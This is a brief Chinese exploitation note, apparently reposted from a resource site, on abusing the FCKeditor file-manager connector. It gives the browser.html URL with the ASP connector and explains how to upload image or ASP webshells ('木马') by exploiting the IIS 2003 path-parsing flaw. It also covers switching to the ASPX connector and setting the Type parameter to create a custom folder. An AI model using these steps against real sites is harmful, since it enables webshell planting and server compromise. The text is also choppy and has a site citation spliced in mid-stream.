网络转载
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马,
fckeditor漏洞利用
,电脑资料
《fckeditor漏洞利用》(https://www.unjs.com)。如果是ASPX的就将/asp/connector.asp后缀改为ASPX
Type=Image这个变量是我们自己定义的。比如:
fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp